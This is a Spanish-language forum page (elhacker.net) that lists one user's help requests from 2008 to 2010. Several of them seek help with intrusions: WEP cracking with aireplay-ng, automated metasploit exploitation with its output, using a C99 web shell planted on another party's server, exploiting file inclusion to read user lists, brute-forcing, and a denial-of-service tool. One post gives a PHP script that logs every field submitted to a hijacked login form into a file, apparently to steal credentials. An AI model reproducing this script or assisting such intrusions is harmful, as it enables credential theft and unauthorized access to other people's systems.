elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Temas
Páginas: 1 ... 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 [39]
381  Seguridad Informática / Wireless en Linux / duda descifrar clave wep CON cliente en: 31 Julio 2010, 21:37 pm
Hola a todos bueno estoi haciendo pruebas en mi red wifi
y claro e encontrado por todos lados tutoriales de como descifrar claves wep pero siempre con el metodo:

Citar
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 (interfase virtual)

y luego aumentando el flujo con:

Citar
aireplay-ng -3 (interfase virtual) -b (bssid) -h 00:11:22:33:44:55 -x 300

pero mi duda es mas basica

Como aumentar el flujo de datos de un cliente ya conectado?


buscando por internet encontre esto:

Citar
aireplay-ng -3 (interfase) -b (bssid) -h (STATION) –x 300

pero claro cuando ejecuto el comando me arroja esto:
Citar
The interface MAC (00:11:22:33:44:55) doesn't match the specified MAC (-h).
        ifconfig wlan0 hw ether 00:1E:65:CE:XX:XX
15:30:20  Waiting for beacon frame (BSSID: 00:26:5A:27:XX:XX) on channel 1
Saving ARP requests in replay_arp-0731-153020.cap
You should also start airodump-ng to capture replies.
^Cad 41 packets (got 3 ARP requests and 6 ACKs), sent 1468 packets...(700 pps)

me da a entender que esta mal especificada por que mi mac fake es 00:11:22:33:44:55

siguiendo con el procedimiento  genero mas paquetes con:

Citar
aireplay-ng -0 1 -a (bssid) -c (STATION) (interfase)

luego empiesa a enviar demasiados paquetes pero no aumenta los datas

intente modificar el codigo de esta manera:

Citar
aireplay-ng -3 (interfase) -b (bssid) -c (STATION) –x 300

pero al hacer esto no marca el error pero me sale got 0 ARP y 0 ACK

me encantaria mucho que me instruieran a como descifrar una con un cliente conectado...

gracias :D
382  Foros Generales / Dudas Generales / Duda ubuntu desktop tty1 en: 2 Junio 2010, 16:22 pm
Hola a todos bueno les cuento tengo instalado ubuntu 9.10 en mi computador y me va de lujo pero
me el problema que tengo es que cuando se prende carga el grub, aparce el simbolo de ubuntu normalmente pero despues de eso aparece la pantalla negro por unos 3 segundos y sale ubuntu desktop ttyp1 pidiendome que ponga login y pass luego sigue normal y aparece la ventana para Iniciar sesion en modo grafico normal
mi duda es como puedo eliminar esa pantalla negra que me pide login y pass siendo que desaparece y no necesito usarla?

gracias
383  Foros Generales / Dudas Generales / Duda con metasploit comando db_autopwn y sessions en: 30 Mayo 2010, 05:06 am
Hola a todos bueno usando metasploit y hago lo siguientel;
db_create
db_import_nessus_xml /home/xxxr/Escritorio/2.nessus
db_vulns
  • Time: Sun May 30 02:58:28 UTC 2010 Vuln: host=xxx.xx.xx port=8090 proto=tcp name=NSS-0 refs=
  • Time: Sun May 30 02:58:32 UTC 2010 Vuln: host=xxx.xx.xx port=8090 proto=tcp name=NSS-34970 refs=CVE-2009-3099,CVE-2009-3548,CVE-2010-0557,BID-36253,BID-36954,BID-37086,BID-38084,OSVDB-57898,OSVDB-60176,OSVDB-60317,OSVDB-62118

luego uso el comando db_autopwn con esto -t -e -x (agrego -t -e -x por un manual no entiendo eso)
y me arroja esto:
  • ================================================================================
  •                             Matching Exploit Modules
  • ================================================================================
  •   xxx.xxx.xxx.xx:12090  exploit/multi/http/tomcat_mgr_deploy  (OSVDB-60317)
  • ================================================================================
  • (1/1 [0 sessions]): Launching exploit/multi/http/tomcat_mgr_deploy against xxx.xxx.xx:12090...
  • (1/1 [0 sessions]): Waiting on 1 launched modules to finish execution...
  • (1/1 [0 sessions]): Waiting on 0 launched modules to finish execution...
  • The autopwn command has completed with 0 sessions

y luego pongo

msf > sessions

Active sessions
===============

No active sessions.


NO entiendo eso de sessions si alguien podria explicarmelo de echo no se que estoi haciendo solo se que metasploit esta interpretando los resultados de nessus y luego los lanza mi duda es que por que no funciona es por que dice session 0? porfavor gracias

EDIT: investigando creo que en UBUNTU no funciona muy bien este comando, Creo entender las sessions si el exploit funciono deberia haber sessions?, si me equivoco correjirme

Ahora mi nueva duda es como elegir los payloads que entega  funcionan todos? si el servidor corre en windows y elijo un payloads que parte con windows/ da igual cual SO sea (windows 98,XP,windows NT)?
384  Foros Generales / Dudas Generales / Duda basica con respecto a metasploit en: 26 Mayo 2010, 05:42 am
Hola a todos, escaneo webs con nikto y me arroja algunas alertas al igual que con acunetix pero mi duda es como las busco con metasploit me refiero al nombre ya que este lo ejecuto en modo web y al buscar el exploit no me encuentra casi nada muchas gracias
385  Seguridad Informática / Nivel Web / Duda sobre como conectarme a base de datos MYSQL en: 6 Marzo 2010, 22:04 pm
Hoola a todos bueno les cuento e logrado subir una shell (!C99Shell v. 1.0 pre-release build #16!) pero mi problema es que no logro tener acceso a la base de datos,use el
SQL Manager del phpshell y no logro conectarme,e intentado con el puerto default 3306 y me aparece acceso denegado pero tengo entendido que la base de datos a la cual me quiero conectar corre por el puerto 1433, cuando cambio a ese puerto se queda dando vueltas y aparece esto:
Citar
Can't connect
Lost connection to MySQL server during query
mi pregunta es de que forma puedo tener el acceso a las base de datos?
existe algun cliente en PHP que se conecte a la BD
posible conexión remota de MYSQL 2000
si es asi de que manera pudo activar

:SERVER STATUS
Citar
corre bajo MYSQL SERVER 2000
sistema operativo WINDOWS XP

porfavor necesito su ayuda gracias :D


________________________________

en mi pc implemtento la misma base de datos y al igual no logro entrar la phpshell me deja el siguiente mensaje probando con el puerto 1433 y 3306

Citar
SQL Manager:
Can't connect
Can't connect to MySQL server on 'localhost' (10061)

Porfavor ayuda :G

saludos :D
386  Programación / PHP / duda sobre pishing.php en: 4 Marzo 2010, 19:11 pm
Hola a todos bueno les cuento tengo una duda lo que pasa es que logre tomar el control de un index.php y quiero editar el <form method="post" ACTION=datos.php

el codigo de datos.php pienso ponerle esto:

Código:
<?php
header ('Location: http://www.web.com/ ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

pero si ago lo anterior ningun usuario podria autentificarse ya que solamente guardaria los datos y despues lo redireccionaria a otra web  :-(
me gustaria que redireccionara autentificado,existe alguna manera para que se guarden los datos del form o que se intercepten y que despues se logue?
si me pudieran explicar un poquito se los agradeceria demasiado

desde ya gracias
387  Seguridad Informática / Nivel Web / Duda File inclusion en: 19 Agosto 2008, 02:30 am
Hola a todos bueno e estado investigando acerca de esta vulnerabilidad,e podido explotarla en una web y me entrega todos los usarios e informacion que tienen,pero tengo unas dudas

por lo que leido

1-¿uno puede explorar el pc del servidor? o solamente me entrega los usuarios del el server



2-si es así como me muevo? es por el navegador?


3-por lo que se las claves de las cuentas no quedan guardadas en /etc/passwd sino quedan guardadas en un /etc/passwd/shadow se supone que solo el root puede tener acceso a dicha carpeta


cuando use el exploit no me aparecio ese directorio esto es por causa de que no lo tiene,por que solamente queda guardada en /etc/passwd o me equivoco??

4-si solamente me entregara los usarios del pc,¿como puede tener acceso al servidor osea entrar para loguearme (que puerto por donde)?

5-¿existe algun bruteforce para poder entrar al servidor?

6-¿que diferencia una cuenta login de una nologin?


Porfavor espero una respuesta a mis dudas xD Muchas Gracias,por tomarse el tiempo en leer este post lleno de duas :)
388  Programación / Programación Visual Basic / Problema con mi aplicacion[Dificultad noob] en: 17 Agosto 2008, 17:53 pm
Hola a todos bueno les cuento me estoy iniciando en visual basic recien aprendi lo q era una variable xd un msgbox y peuqeñas cosas mas bueno les cuento estoy tratando de hacer una aplicacion que haga lo siguiente
1-escribir un texto en una pagina web y luego presionar el boton de enviar de la web

busque por internet comandos y lo ise de esta forma

Private Sub Command1_Click()
WebBrowser1.Navigate "http://apps.new.facebook.com/guerra-de-pandillas/discussion.php"
WebBrowser1.Document.All.Item("wall_text").Value = Text1.Text
WebBrowser1.Document.All.Item("inputsubmit").Click
End Sub


El problema es que me marca un error 424 dice que falta un objeto

Porfavor necesito su ayuda,les pide que si tengo que agregar un comando mas o otra cosa que me explique que hace tal comando ya que mi idea es aprender no copiar y pegar sources ^^

Gracias
389  Programación / Programación Visual Basic / [Ayuda]transformar aplicacion ejecutable para shell/cmd en: 30 Julio 2008, 02:18 am
Hola a todos bueno tengo una gran duda mas que nada no es para mi sino un amigo que sabe programar y todo Bueno les cuento mi amigo a creado una aplicacion pero le gustaria que se pudiera ejecutar por cmd/shell como los exploit en perl algo asi y que desde hay mismo se pudiera configurar
ej:"aplicacion.exe 900 -t

hay algun manual para eso?
Gracias

PD:el programa es para hacer ataques de denegacion de servicios

Muchas Gracias Adios
390  Programación / Scripting / [Ayuda] Duda Con Batch en: 21 Julio 2008, 06:54 am
Hola a todos Bueno quiero Hacer lo siguiente en mi batch pero no se como xD

Aqui va


Quiero crear automaticamente un documento.inf y que este dentro ya tenga escrito algo

Es posible en batch Gracias
Páginas: 1 ... 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 [39]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines